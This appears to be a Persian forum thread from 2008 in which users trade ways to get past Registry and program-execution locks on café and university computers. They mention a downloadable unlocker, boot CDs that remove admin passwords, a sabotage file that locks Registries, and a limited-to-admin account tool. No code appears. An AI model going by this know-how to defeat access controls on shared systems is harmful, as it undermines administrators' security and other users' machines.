مشاهده نسخه کامل
: باز کردن Registry در هر کامپیوتر 100 % تضمینی
سلام دوستان ::10:
با این فایل شما میتونید Registry رو در هر کامپیوتر دلخواهی باز کنید و دسترسی داشته باشید حتی توی کافی نت ها که معمولا Registry رو میبندن و هر جای دیگر به صورت 100% تضمینی
"البته هر گونه سو استفاده از مطلب به عهده فرد میباشد"
فایل زیر را دانلود کنید :
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
عزیز دلم
اگه خود فایل regedit رو ببندن دیگه هیچ کاری نمیشه کرد
خیلی کار ها میشه کرد که نشه ریجستری رو باز کرد و هیچ برنامه ای هم نمیتونه کاری انجام بده
مثلا این که اجازه ندیم برنامه ای نصب بشه و خیلی راحت ریجستری رو هم ببندیم
موفق باشی
djsystem
06-01-2008, 11:24
عزیز دلم
خیلی کار ها میشه کرد که نشه ریجستری رو باز کرد و هیچ برنامه ای هم نمیتونه کاری انجام بده
موفق باشیصد در صد درسته
SadeghPM
06-01-2008, 12:23
صد در صد درسته
من از سخت گیرترین و سمج ترین سیستم ها هم تونستم رجیستریشونو اجرا کنم .
حتی به راحتی می تونیم از این محدودیت هایی که دوستان گفتن هم گذشت.
اگه توضیح بیشتر خواستین حاضرم.....
samanvilli
06-01-2008, 13:03
آقا صادق خوشحال ميشيم شيوه تون رو معرفي كني! منتظريم . . .
MB_Danger
06-01-2008, 13:48
سلام ...
تاپیک به بخش معرفی نرم افزارهای کاربردی ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) منتقل شد .
موفق باشید .
K A R I M I
06-01-2008, 18:44
اگر ما رجیستری رو از داخل خوش از کار بندازیم چه جوری باید بدون استفاده از برنامه جانبی اونو دوباره به کار بندازیم؟
بابا اگه رجستری بسته بشه اما بازم این برنامه میتونه رجستری رو برات باز کنه میتونی امتحانش کنی ضرر نداره !!
K A R I M I
07-01-2008, 00:19
عزیزم من خودم بدون برنامه هم میتونم بازش کنم ( کاری نداره که ) فقط میخوام در شرایط سخت بدونم که چه جوری بدون استفاده از برنامه بتونیم بازش کنیم...
SadeghPM
09-01-2008, 13:29
عزیزم من خودم بدون برنامه هم میتونم بازش کنم ( کاری نداره که ) فقط میخوام در شرایط سخت بدونم که چه جوری بدون استفاده از برنامه بتونیم بازش کنیم...
یه شرایطه سخت دوستان مثال بزنند تا من توضیح بدم....
بابا اگه رجستری بسته بشه اما بازم این برنامه میتونه رجستری رو برات باز کنه میتونی امتحانش کنی ضرر نداره !!
این دوستمون کاملا درست میگن میتونین امتحان کنین...
K A R I M I
09-01-2008, 21:46
خوبه
منظور من از شرایط سخت اینه که یکی بهت گفته بیایی و کامپیوترش رو درست کنی شما میری میبینی که مثلا رجیستری به هر دلیلی قفل هستش و میخوای رجیستریش رو باز کنید و مجبورید از خود ویندوز کمک بگیرید !!!!
اولین روشی رو که من استفاده میکنم به جای regedit مینویسم regedt32
اگر جواب نداد مجبورم با استفاده از cmd ( اون دستوری رو که تقریبا همه ما بلدیم و از خود رجیستری میتونیم رجیستری رو از کار بندازیم ) داده مربوطه رو پاک کنم . که در بیشتر موارد درست میشه !!!!!
خوب حالا من میخوام بدونم که چه کارهای دیگه ای رو میتونیم برای باز کردن رجیستری انجام بدیم البته خودمون و با استفاده از ابزار ویندوز !!!!!!!!!!!!!!!!!!!!!!!! نه برنامه های فرعی...
SadeghPM
12-01-2008, 19:09
خوبه
منظور من از شرایط سخت اینه که یکی بهت گفته بیایی و کامپیوترش رو درست کنی شما میری میبینی که مثلا رجیستری به هر دلیلی قفل هستش و میخوای رجیستریش رو باز کنید و مجبورید از خود ویندوز کمک بگیرید !!!!
اولین روشی رو که من استفاده میکنم به جای regedit مینویسم regedt32
اگر جواب نداد مجبورم با استفاده از cmd ( اون دستوری رو که تقریبا همه ما بلدیم و از خود رجیستری میتونیم رجیستری رو از کار بندازیم ) داده مربوطه رو پاک کنم . که در بیشتر موارد درست میشه !!!!!
خوب حالا من میخوام بدونم که چه کارهای دیگه ای رو میتونیم برای باز کردن رجیستری انجام بدیم البته خودمون و با استفاده از ابزار ویندوز !!!!!!!!!!!!!!!!!!!!!!!! نه برنامه های فرعی...
خوبه
منظور من از شرایطه سخت اینه که ، یه جایی هستی(مثلا دانشگاه یا کافی نت یا یه مکان عمومی) و میخوای به هر دلیلی (خرابکاری ، استفاده از یک برنامه ، نصب یه برنامه و ...) به رجیستری یا اجرای برنامه ها دسترسی داشته باشی . منظوره من این بود که زمین تا زیرزمین !!!:46: با منظور شما فرق میکنه.
در ثانی :این چیزی که شما می خوای خیلی چیز ارزش داری نیست یعنی شما می یاین و یه نعمت هایی(ابزارها) رو به خودتون حروم (قدغن) می کنین!!!
حالا منظور منو از منظورم :46: گرفتی.... نه ....
اگه دوست داشتی تا توی این زمینه بحث کنیم....ههههههبببببببببب!!!
K A R I M I
12-01-2008, 20:26
چه عجب صادق خان اومدند !
خوب با صحبت های شما دیگه جای بحث باقی نمیمونه ، آب پاکی رو دستمون ریخته شد
همه افراد میتونند با این برنامه رجیستری رو بازگردونند ولی افراد زیادی نمی تونند که خودشون دست به کار بشند
مثلا برنامه های مدیریت استارت آپ ویندوز خیلی هست ولی افرادی هستند که نمی تونند با استفاده از رجیستری یا ام اس کانفیگ برنامه هاشون رو تو استارت آپ مدیریت کنند ، این برای نمونه بود در سطح مبتدی
در هر صورت اگر راهی بلدید که با استفاده از ویندوز بتونیم رجیستری رو برگردونیم بفرمایید تا ما هم بر اطلاعاتمون افزوده بشه
ممنون
SadeghPM
13-01-2008, 13:28
چه عجب صادق خان اومدند !
خوب با صحبت های شما دیگه جای بحث باقی نمیمونه ، آب پاکی رو دستمون ریخته شد
همه افراد میتونند با این برنامه رجیستری رو بازگردونند ولی افراد زیادی نمی تونند که خودشون دست به کار بشند
مثلا برنامه های مدیریت استارت آپ ویندوز خیلی هست ولی افرادی هستند که نمی تونند با استفاده از رجیستری یا ام اس کانفیگ برنامه هاشون رو تو استارت آپ مدیریت کنند ، این برای نمونه بود در سطح مبتدی
در هر صورت اگر راهی بلدید که با استفاده از ویندوز بتونیم رجیستری رو برگردونیم بفرمایید تا ما هم بر اطلاعاتمون افزوده بشه
ممنون
علت اینکه دیر کردم این بود که درگیر امتحانات بوده و هستم (پایان ترم)
دوم:(حالا کو اولش !!!)
ببین این چیزی که شما دنبالشین به هیچ دردی نمی خوره.... یعنی من نمی دونم چه اصراری بر این هست که حتما از طریق ویندوز این کار انجام بشه؟؟؟:41: به نظر من هدف مهم تر از ابزار هستش
شما به اون هدفتون هر طوری که خواستین می تونین برسین... علاوه بر این این قدر به دنبال این قبیل کارها تو ویندوز نباشین !!!! یعنی به دنبال این نباشین که از طریق ویندوز یه چیزی رو برای کاربر (مثلا همین رجیستری) غیر فعال کنین بعد به دنبال راهی به وسیله خود ویندوز برای دور زدن این راه باشین...
حالا من یه سوال مطرح می کنم : می تونین بهش جواب بدین؟
یه سیستم داریم که کاربریش به صورته Limit هستش .خوب ... رجیستری این سیستم قفل شده و از کاربر اجازه(Permision) ویرایش رجیستری(Write) نیز گرفته شده.... محدودیت های سنگینی !!! از جمله این که هیچ برنامه ای به جزء برنامه های ویندوز اجرا نمی شن!!!
نیز اعمال شده ( این هاییی که گفتم حتما مستحضرید که عملی هستند!!!)
سوال من اینه : شما برای اجرای یه برنامه دلخواه چه راهی می تونین پیدا کنین؟؟؟
K A R I M I
13-01-2008, 19:43
با اجازه شما از دوستانم مهدی و winxp کمک میگیرم ( برای کامل تر شدن بحث ) ، از قدیما گفتن کار نشد نداره شاید این دفعه حرفشون غلط باشه !
mahdi7610
13-01-2008, 21:43
سلام
من فکر نمی کنم محدودیت های که به وسیله بعضی از نرم افزارها برای رجیستری گذاشته می شه را بشه رد کرد . البته با خود سیستم عامل محاله . با نرم افزار احتمال می شه داد .
من روشی که دوستمون توی پست اول قرار دادن را خیلی وقته می دونم و از همین روش هم استفاده می کردم توی خیلی از کافینتها که با خود سیستم عامل رجیستری را قفل کرده بودند راحت جواب می ده .
اما توی بعضی دیگه که از برنامه های قوی تری استفاده کرده بودند متاسفانه جواب نمی ده .
حتی توی بعضی ها هم که با برنامه فقل شده بود جواب می داد .
دوست عزیز SadeghPM این سوال شما با استفاده از safe mode و استفاده از روش پست اول جواب می ده .
یه سیستم داریم که کاربریش به صورته Limit هستش .خوب ... رجیستری این سیستم قفل شده و از کاربر اجازه(Permision) ویرایش رجیستری(Write) نیز گرفته شده.... محدودیت های سنگینی !!! از جمله این که هیچ برنامه ای به جزء برنامه های ویندوز اجرا نمی شن!!!
در بعضی از کافینتها شما به هیچ عنوان نمی تونید برنامه نصب کنید و با نصب برنامه سیستم ریست خواهد شد . مگر اینکه بتونید از برنامه های پرتیبل استفاده کنید که نیاز به نصب نداشته باشند .
اما با دستورات خود سیستم عامل بعید می دونم بشه رجیستری را باز کرد .
اگه می شه این روش را بگید ببینیم . بلاخره شما کاربر بخش امنیت نرم افزار هستید و باید اطلاعات بیشتری از ما داشته باشید .
سلام به دوستای خوبم , مخصوصا کریمی جون
والا مهدی جون اطلاعاتش از من بیشتره و من نمیتونم رو حرف ایشون حرف بزنم
این طوری به نتیجه نمیرسین
اول بیاین ببینین میخواین چی کار کنین , میخواین ریجستری دور بزنین یا نرم افزار
یه مثال اول بزنین که مثلا پشت یه سیستم نشستیم و این کار هارو هم نمیتونیم انجام بدیم , حالا چی کار کنیم
همون طور که اطلاع دارین هر نرم افزاری یه جور نوشته میشه و هر نرم افزاری هم برای محدود کردن کاربر از یه سطحی استفاده میکنه
مثلا من میشینم یه برنامه مینویسم که باهاش بتونیم درایو رو قفل کنیم
برنامه میاد پرمیزیشنها رو تغییر میده و درایو accses میده
یه کاربر مبتدی نمیتونه ازین عبور کنه ولی یه حرفه ای تر میتونه
حالا یه روسی ها هم میشینن یه برنامه برا قفل کردن درایو مینویسن که هیچ کاربر حرفه ای هم نتونه ازش بگذره
پس اول ببینین میخواین از چی بگذرین
من تا حالا هیچ چیزی رو در مورد کامپیوتر سخت ندونستم , مشکل ما ایرانی ها اینه که انگلیسی بلد نیستیم و کشورمون عقب افتادس و الا بچه هایی که من تو این سایت دیدم خیلی خیلی ای کی یوشون از خارجی ها بهتره
میدونم ربطی به بحث نداشت ولی اعصابم خورده ازین درسهای مزخرف دانشگاه که فقط عمر ادم رو تلف میکنن
من این جور بحثهارو خیلی دوست دارم و مشتاقم بحث با هدف بره جلو
حالا یکی بگه اینجا چه خبره ؟!!!!!!!!!!!!!!!!!!
سوال من اینه : شما برای اجرای یه برنامه دلخواه چه راهی می تونین پیدا کنین؟؟؟
من میگم میشه ولی راهش رو هنوز بلد نیستم
یعنی اطلاعاتم هنوز در اون حد نیست
این سوال رو باید اونایی که ویندوز رو نوشتن جواب بدن
من یه راه پیشنهاد میکنم , شایدم خنده دار باشه
اول این که ببینیم لایه های امنیتی توسط کدوم بخش ویندوز و کدوم پروسه مدریت میشه
مثلا فرض میگیریم با پرو سه ی svchost.exe باشه
حالا تحلیل کنین ببینیم این پروسه کارش چیه و با چه پروسه های دیگه در ارتباطه
و در نهایت ببینیم اون دیواره ی اصلی کجا بنا شده
حالا بیایم ببینیم با دستورات bat میتونیم یا فایلی بسازیم و جایی از ویندوز قرارش بدیم که قبل از login به ویندوز اجرا بشه ؟
تو این فایل مینویسیم که فلان مسیر ریجستری رو از کار بنداز و همه چی حل میشه
یا تو اون فایل میزنیم فلان پروسه رو برا 1 دقیقه از کار بنداز
نمیدونم ولی مطمئنم میشه
شاید 10 سال دیگه راهش رو پیدا کردم !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!
موفق باشین همگی
K A R I M I
14-01-2008, 07:16
مهدی عزیز گفتند : مگر اینکه بتونید از برنامه های پرتیبل استفاده کنید که نیاز به نصب نداشته باشن اما با دستورات خود سیستم عامل بعید می دونم بشه رجیستری را باز کرد ...
صادق عزیز باید ببینیم این روش جواب میده یا نه ( با توجه به شرایط سختی که گذاشتید )
winxp عزیز : اول این که ببینیم لایه های امنیتی توسط کدوم بخش ویندوز و کدوم پروسه مدریت میشه
مثلا فرض میگیریم با پرو سه ی svchost.exe باشه
حالا تحلیل کنین ببینیم این پروسه کارش چیه و با چه پروسه های دیگه در ارتباطه
و در نهایت ببینیم اون دیواره ی اصلی کجا بنا شده
حالا بیایم ببینیم با دستورات bat میتونیم یا فایلی بسازیم و جایی از ویندوز قرارش بدیم که قبل از login به ویندوز اجرا بشه ؟
winxp جان مطمعن باش که راهی رو که شما گفتید 100 در 100 عملی هست چون اگر با برنامه هایی مثل کامپیوتر تایم کار کرده باشید میبینید که این برنامه که یه جوری نوشته شده که اوا خودش رو میاره بالا و به هیچ چیز دیگه ( مانند آنتی ویروس یا هر چیزی که فکرش رو بکننید ) اجازه نمیده ...
کل بحث سر این هست که ما یه جایی گیر کردیم ( بر حسب اتفاق ) و از این برنامه های جانبی گیر دستمون نیست که بتونیم باهاش رجیستری رو باز کنیم من می خوام در این زمینه اطلاعتم رو افزایش بدم همین ...
منم زیر آبی میرم ! با استفاده از برنامه Hirent boot ( دانلودش کردم ولی تا حالا ازش استفاده نکردم و حتی نمی دونم که اسمش رو هم درست نوشتم یا نه ؟ ) میتونیم بریم تو ادمین این به اون سخت گیری های شما در (پس میشه یه کارایی کرد )
خوب حالا ما دنبال این هستیم که اطلاعات خودمون رو زیاد کنیم و می خواهیم همه روش های این دور زدن ها رو یاد بگیریم ( بیشتر بدون کمک از برنامه های فرعی )
SadeghPM
14-01-2008, 13:41
hاز همه دوستان که در بحث شرکت کردنند متشکرم....:11:
برای روشن تر شدن منظورم یه فیلم از سیستم مورد نظر می گرم و براتون آپلود می کنم تا بهتر منظورمو بگیرید...
اعصابم خورده ازین درسهای مزخرف دانشگاه که فقط عمر ادم رو تلف میکنن
آی گفتی عزیز .... حرف دل مارو زدی....:41:
نگاه کن.... چرا ما همیشه به فکر کارهای سخت و عجیب غریب هستیم؟؟؟؟
من در کل بعد از گذاشتن فیلم مورد نظر و روشن شدن بحث ، هم روش اعماله محدودیت ها رو میگم و هم آنتی شو.... و می بینید که چقدر ساده میشه دور زد....
بحث رو از کافی نت ها بیرون بیارید و به شبکه های کامپیوتری که یه سرور مرکزی و تعداد زیادتری(خیلی بیشتر از کافی نتی ها) کامپیوتر و کاربر دارن ربط بدین.... مثلا همین دانشگاه کوفتی ما:46:
روی برنامه خاصی هم تاکید نکنید که خود ویندوز برای این کارا کافیه....
نمی دونم تا حالا دوستان شبکه هم کار کردند یا نه؟؟؟ توی بحثمون به درد می خوره ..
من برم امتحانمو بدمو برگردم فیلمو برای شما Uploud کنم...
به شدت علاقه مند به بحث در موضوعات امنیتی هستم.... و از ذوستان می خوام که ادامه بدن تا به نتایجه خوبی برسیم....
1:40 PM
با استفاده از برنامه Hirent boot ( دانلودش کردم ولی تا حالا ازش استفاده نکردم و حتی نمی دونم که اسمش رو هم درست نوشتم یا نه ؟ ) میتونیم بریم تو ادمین این به اون سخت گیری های شما در (پس میشه یه کارایی کرد )
خوب حالا ما دنبال این هستیم که اطلاعات خودمون رو زیاد کنیم و می خواهیم همه روش های این دور زدن ها رو یاد بگیریم ( بیشتر بدون کمک از برنامه های فرعی )
اره اسمشو اشتباه نوشتید باید به این صورت نوشته بشه: Hiren's BootCD
یه توضیحی در این مورد بدم:
این یه ایمیج هستش که ابزارهای بسیار گوناگونی در قالب بوت به شما ارائه میده که یه قسمت خیلی کوچولوش مربوط به حذف پسورد Admin از طریق بوت هستش.
از تو این وادی ها هم بیاین بیرون.... آخه اگه یارو قسمت بوت سی دی رو برداشته باشه و برای BIOS هم پسورد گذاشته بود چی؟.... آره می دونم حتما دوباره میگید با روش هایی پسورد BIOS رو حذف می کنیم.... بیاین فقط از طریق ویندوز بحث کنیم... ههههبببببب
سوالی که دوست داشتم دوستان بگن و نگفتن اینه که: این محدودیت اجرا نشدن هیچ فایل Exe چطوری اعمال شده؟ یا اصلا وقتی یه فایل Exe رو اجرا می کنیم چی میشه؟ چه پیغامی مثلا سیستم میده؟؟؟
من روشی که دوستمون توی پست اول قرار دادن را خیلی وقته می دونم و از همین روش هم استفاده می کردم توی خیلی از کافینتها که با خود سیستم عامل رجیستری را قفل کرده بودند راحت جواب می ده .
اما توی بعضی دیگه که از برنامه های قوی تری استفاده کرده بودند متاسفانه جواب نمی ده .
حتی توی بعضی ها هم که با برنامه فقل شده بود جواب می داد .
توی این مورد دوستان یه چیزی رو فراموش می کنند و اون اینه که باز کردن رجیستری و دیدن محتویات اون به هیچ دردی نمی خوره !!!!
یعنی اینکه اگه اجازه(Permisin) ویرایش ( Write) رجیستری گرفته شده باشه ، حالا حتی اگه کاربر لیمیت با ابزار خود ویرایش رجیستری ویندوز یا هر ابزار دیگه ای نمی تونه رجیستری رو ویرایش کنه.... در کل : دیدن رجیستری ملاک قابل تغییر بودن اون نیست!!!!
SadeghPM
14-01-2008, 16:52
اینم فیلمی که گفته بودم:
326 کیلو بایت
سلام عزیزان
این طوری که پیش میره پس ما هیچی نمیدونیم هنوز
صادق جان بحث رو بازش کن بفهمیم چی به چیه
یه کم توضیح بده , فیلمتم زدم دان شه ببینیم چیه
منتظریم
djsystem
15-01-2008, 13:12
من هنوز فیلم رو ندیدم
ولی سیستم دانشگاه ما یه طوریه که نه فایل exe نه bat و نه هیچی نمیشه اجرا کرد پس از نرم افزار صحبت نکنید حتی portable
به cmd و rigestery هم هیچگونه دسترسی نداریم حالا چکار میشه کرد ؟
تو star menu فقط my computr هست و بس
meisam317
17-01-2008, 00:16
خیلی جالب بیده تو کامپیوتر دانشگاه امتحان می کنم
djsystem
17-01-2008, 11:38
من هنوز فیلم رو ندیدم
ولی سیستم دانشگاه ما یه طوریه که نه فایل exe نه bat و نه هیچی نمیشه اجرا کرد پس از نرم افزار صحبت نکنید حتی portable
sadegh جان پس چی شد ؟
djsystem
17-01-2008, 17:31
sadeghpm گل اون فیلم فقط راجب محدودیت بود
راه حلشو نشون بده
omid.sarmad
17-01-2008, 17:55
سلام.
قابل توجه تمام کسایی که می گن از محدودیت رجیستری نمیشه گذاشت:
به طور کل راههای زیادی برای گذشتن از محدودیت رجیستری وجود داره،بستگی داره که چه جوری محدود شده باشه،ولی اگر به گفته یکی از دوستان رجیستری از طریق خودش محدود شده باشه که کار خیلی سادس.یه اسکریپت سه خطی می خواد.حتی کسایی که اسکریپت نویشی بلد نیستن می تونن با دابل کلیک رو یه فایل reg اونو باز کنن.من در عجبم که چطور اساتید با این همه اطمینان میگن نمیشه.
قابل توجه تمام کسانی که میگن میشه گذشت:
بزارید یه مسابقه براتون بزارم.من رو سیستمم چند تا اشکال وجود داشت،که همشون از طریق رجیستری درست می شدن.ولی نمی شد رجیستری رو run کرد.
یکی از اشکالها این بود که به دلیل گرفتن ویروس فایلهای اجرایی run نمی شدند.
یکی دیگه از اشکالا این بود که فایلهای reg باز نمی شدند.
اینکارو خودم تو رجیستری انجام دادم.ولی به خودم اومدمو دیدم به هیچکاری نمی تونم بکنم.
البته بعد از نیم ساعت مشکل حل شد.یعنی خودم حلش کردم.
حالا اگر کسی می تونه این مشکل رو روی سیستم خودش حل کنه،بگه تا یه فایل اپ کنم.
این فایل اشکالهایی که گفتم رو سیستمتون پیاده می کنه.
omid.sarmad
17-01-2008, 18:03
من هنوز فیلم رو ندیدم
سلام.دوست عزیز شما هم به مشکل من ( البته مشکل گذشته من) برخوردید.
همونطور که گفتم اینهم راه حل داره.
sadeghPM عزیز بنده جسارت نمی کنم کاره خودته، بیا جلو.
سلام اساتید اهل فن
من یه خورده حرف دارم
اول از صادق جان شروع میکنم
تک تک اون محدودیتها رو بگو چی طوری اعمال کردی تا منم رو سیستمم اعمال کنم ببینم میتونم نفوذ کنم یا نه ؟
ازت خواهش میکنم فقط کامل باشه و تا اخر این تاپیک باشی
اما امید اقای عزیز
اون فایل رو برا من up کن ببینم من چی کار میکنم , بعدا اگه نتونستم سیستممو درست کنم ازت میخوام راهشو بگی
بحث خیلی خوبی راه انداختین
امیدوارم تا اخرش باشین
موفق باشین
omid.sarmad
19-01-2008, 11:17
سلام اساتید اهل فن
من یه خورده حرف دارم
اول از صادق جان شروع میکنم
تک تک اون محدودیتها رو بگو چی طوری اعمال کردی تا منم رو سیستمم اعمال کنم ببینم میتونم نفوذ کنم یا نه ؟
اما امید اقای عزیز
اون فایل رو برا من up کن ببینم من چی کار میکنم , بعدا اگه نتونستم سیستممو درست کنم ازت میخوام راهشو بگی
بحث خیلی خوبی راه انداختین
امیدوارم تا اخرش باشین
موفق باشین
چشم.آپ می کنم.فقط چون سرکته (سکرته) باید setup کنمش.البته اگه موارد مربوطه رو بگم باز هم نمیشه کاریش کرد.
سلام
ما همچنان منتظریم ها
K A R I M I
20-01-2008, 03:37
سلام
من تازه از مسافرت بر گشتم ، دارم تاپیک رو میخونم !
omid.sarmad
20-01-2008, 15:44
سلام
ما همچنان منتظریم ها
سلام.باش عزیزم.
بیا برات آپ کردم.ولی پیشنهاد می کنم اگه حال ویندوز عوض کردن نداری اجراش نکنی.
دیگه خود دانی.
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
راستی بهروز عزیز خواهش می کنم از این برنامه سوء استفاده نکنی و باعث برهم زدن آرامش سیستم دیگران نشی.
SadeghPM
28-01-2008, 13:09
بسم رب شهدا...
از دوستايي كه توي بحث شركت كردن بسيار متشكرم
يه مدت نبودم البته تو قسمت امضا نوشته بودم...
امروز اين آموزش رو اماده مي كنم و توي اولين فرصت ممكن براتون آپ مي كنم...
سلام.باش عزیزم.
دیگه خود دانی.
دوست ندارم وارد بحث هايي كه ويروس ها انجام ميدن بشم!!! بزارين اول اين موضوعي رو كه شروع كرديم تموم كنيم بعد به اين بحث هم مي رسيم...
اگه دوستان تمايل داشتن كارهايي رو كه ويروس ها انجام ميدن (كه هميشه جالب ترين و زيبا ترين ترفند ها هستند)رو هم شروع مي كنيم ...
فكر خوبيه ...من يه فايل EXE درست ميكنم كه با يك كليك اين كار رو انجام بده بعد دوستان روش كار كنن....
البته اگه راه اصليشو بگم كه ديگه آنتي شم گفتم.....
تو اولين فرصت آپ مي كنم...
در ضمن اون فيلمي كه من گذاشتم از روي سيستم هاي دانشگاهمون بود نه سيستم خودم... كه به وسيله سرور مركزي به سيستم ها اعمال ميشه...
SadeghPM
30-01-2008, 10:46
دیگه خود دانی.
راستی بهروز عزیز خواهش می کنم از این برنامه سوء استفاده نکنی و باعث برهم زدن آرامش سیستم دیگران نشی.
دلم نیومد سوال دوستمون بی جواب بمونه:
omid.sarmad
31-01-2008, 10:18
سلام.دوست عزیز این فایل فقط فایلهای اجرایی رو غیر فعال نمی کنه،بلکه رجیستری رو قفل می کنه.
آیا شما تونستید فایلرو اجرا و بعد مشکلشرو حل کنید؟
بی تردید بعید میدونم.
SadeghPM
31-01-2008, 10:34
سلام.دوست عزیز این فایل فقط فایلهای اجرایی رو غیر فعال نمی کنه،بلکه رجیستری رو قفل می کنه.
آیا شما تونستید فایلرو اجرا و بعد مشکلشرو حل کنید؟
بی تردید بعید میدونم.
این کار اینقدر ابتداییه که فکر کردم مد نظر شما نبوده!!!!!!!!
اونم کاری نداره:46:
اما اون برنامه ای که قولشو داده بودم امروز تمومش کردم...
تستش کنید و جواب رو بگید.... البته هنوز کامل نیست و یه قسمت از یه برنامه کامل هستش ..البته اول تویه یوزر Admin امتحانش کنین...
منتظر نظرات هستم......
لینک دانلود 1.7 مگبایت:
کاشکه یه جای دیگه آپلود کنی برا من فیلتره
SadeghPM
02-02-2008, 10:26
پس چی شد یعنی هیچ کسی از دوستان که می گفتند ، یه نمونشو بزار ما روش کار کنیم دیگه نیستن؟؟؟؟
واقعا متاسفم ..... لینکو تا امشب Remove میکنم....
واقعا متاسفم....
mehdi_vsgh
02-02-2008, 11:28
اونم کاری نداره:46:
تستش کنید و جواب رو بگید.... البته هنوز کامل نیست و یه قسمت از یه برنامه کامل هستش ..البته اول تویه یوزر Admin امتحانش کنین...
منتظر نظرات هستم......
لینک دانلود 1.7 مگبایت:
All download slots assigned to your country (Iran) are currently in use. Please try again in a few hours or install the Megaupload Toolbar for immediate access - with the toolbar installed, there are no more slot limitations for you!
djsystem
02-02-2008, 20:35
sadegh عزیز جون من ی بار دیگه upload کن
آقا صادق وقتی ما نمی تونیم دانلودش کنیم چه طور روش کار کنیم!
اگه لینکو تو یه جا دیگه آپ کنی قول 100 در 100 بهت میدم که روش کار کنم و جوابو بهت بدم
SadeghPM
03-02-2008, 10:31
آقا صادق وقتی ما نمی تونیم دانلودش کنیم چه طور روش کار کنیم!
اگه لینکو تو یه جا دیگه آپ کنی قول 100 در 100 بهت میدم که روش کار کنم و جوابو بهت بدم
من نمی دونم.... یعنی شما این پیغامی رو که سایت MegaUpload میده رو متوجه نمیشین چیه؟؟؟؟
یعنی تا حالا از سایتMegaUpload دانلود نکردین؟؟؟
حالا شما که نتونستین بعد از 3 روز چرا بقیه دوستان هیچی نگفتن؟؟؟؟
واقعا نتونستن کاری بکنن؟؟؟ اولش با شور اشتیاق بحث رو شروع می کنن و بعدش ام هیچی.... میزارن میرن...
خیلی حرکت زشت و ناپسندی بود ، چون من فقط به درخواست دوستمون اون برنامه رو نوشتم و وقتمو گرفت... اتفاقا جواب سوال یکی دیگه از دوستان رو هم به صورت فیلم براشون گذاشتم .... ولی ...اشتباه کردم...یه درس خوب بود...
mehdi_vsgh
03-02-2008, 17:22
مگا اپلود ایرانو خیلی تحریم کرده (حتی بیشتر از رپید)
اصلا اجازه دانلود نمیده
من خودم بارها برای یه فایل به این سایت سر زدم ولی همیشه با اون پیغام مسخره روبرو شدم
djsystem
03-02-2008, 18:29
sadegh گل چرا ناراحت میشی
بابا من که این چند روز اصلا نتونستم به اینترنت سر بزنم گناهم چیه ؟
حالا جونم بی خبال شو یه بار دیگه upload کن اگه تو 4shared باشه که چه بهتر
دست درد نکنه
من به اون خیلی نیاز دارم
راستی اون شرایت سخت که میگفتی من مثال زدم ولی شما توجهی نکردی
تو سیستم دانشگاه ما که خیلی خفن هست ما نه با نرم افزار های portable میتونیم کار کنیم و نه هیچ چیز دیگه به run و cmd هم دسترسی نداریم حالا اینم شرایت سختی که میخاستی من باید چه کار کنم ؟
djsystem
03-02-2008, 18:48
راستی یادم رفت بگم ما رو هر چیزی که راست کلیک میکنیم انگار نه انگار هیچ اتفاقی نمی افته و هیچ گزینه ای نمی یاد اینو چکارش کنم ؟
پرسپوليس
04-02-2008, 12:29
خوب آموزش چي شد ما منتظريم
فكر كنم در مورد يوزر limit و admin زياد بحث شده
ساخت يه يوزر ادمين در ليميت كه كار سختي نيست اون هم با يه صفحه html قبلا آموزش اون رو داشتم مي گردم پيدا مي كنم مي زارم
مرسيok
mahdi7610
04-02-2008, 12:43
سلام دوستان ببخشید من امتحاناتم شروع شده بود نبودم . ولی حالا هستم . بحث را هم چند روز یک بار دنبال می کردم .
djsystem
04-02-2008, 18:00
خوب آموزش چي شد ما منتظريم
فكر كنم در مورد يوزر limit و admin زياد بحث شده
ساخت يه يوزر ادمين در ليميت كه كار سختي نيست اون هم با يه صفحه html قبلا آموزش اون رو داشتم مي گردم پيدا مي كنم مي زارم
مرسيokدمت گرم
سلام دوستان ببخشید من امتحاناتم شروع شده بود نبودم . ولی حالا هستم . بحث را هم چند روز یک بار دنبال می کردم .
اقا mahdi مگه اینکه شما به ما کمک کنی sadegh خان که قهر کرده حتی فکر نکنم دیگه به این پست سر بزنه
omid.sarmad
04-02-2008, 19:09
تو سیستم دانشگاه ما که خیلی خفن هست ما نه با نرم افزار های portable میتونیم کار کنیم و نه هیچ چیز دیگه به run و cmd هم دسترسی نداریم حالا اینم شرایت سختی که میخاستی من باید چه کار کنم ؟
سلام.
این فایل رو دانلود کن.
تو درایو C اکسترکتش کن.
فایل omid.sarmad رو اجرا کن.
کادر open With باز میشه.
فایل اجرایی موجود در فایل zip رو بهش معرفی کن.
مشکل حل خواهد شد.
Romina2006
04-02-2008, 21:43
میشه آموزش اونو بذارید
djsystem
05-02-2008, 18:59
ممنون omid جان ولی ما به درایو c هم دسترسی نداریم و همانطور که گفتم حتی برنامههای portable هم اجرا نمیشن با این وجود اگه میتونی یه راه دیگه بگو
در ضمن اون رو هم یه جای دیگه upload کن نه تو rapidshare
من اینو پیدا کردم ولی نتونستم نرم افزارشو دانلود کنم اگه کسی تونست برا ما هم upload کنه(لطفا تو 4shared.com)
ساخت يوزر ادمين داخل يوزر ليميت
این برنامه داخل یوزر لیمیت یوزر ادمین میسازه.
البته 100% جواب نمیده. باید سوراخ های مورد نیاز رو سیستم مورد نظر باز باشه تا برنامه کار کنه.
لینک مستقیم دانلود:
djsystem
05-02-2008, 19:23
راستی Omid جان بعد از اجرای اون چه اتفاقی باید بیفته ؟
کدوم مشکل حل میشه ؟ راست کلیک درست میشه؟
omid.sarmad
06-02-2008, 14:23
راستی Omid جان بعد از اجرای اون چه اتفاقی باید بیفته ؟
کدوم مشکل حل میشه ؟ راست کلیک درست میشه؟
سلام.فایلهای exe اجرا میشن.رجیستری رو باز می کنه.محدودیت import به رجیستری رو از بین میبره و ...
اگه تونستم یه جای دیگه برات آپ می کنم.
عزیز دلم
موفق باشی
چقدر شما مهربونید!
با اجرای یک exe بدون نصب نرم افزار میشه من در کافی نت امتحان کردم
و...
ولی...
mahdi7610
06-02-2008, 20:14
اقا mahdi مگه اینکه شما به ما کمک کنی sadegh خان که قهر کرده حتی فکر نکنم دیگه به این پست سر بزنه
سلام djsystem عزیز
برای چی اقا صادق قهر کردن . مگه چی شده ؟
یه چند روز من نبودما .
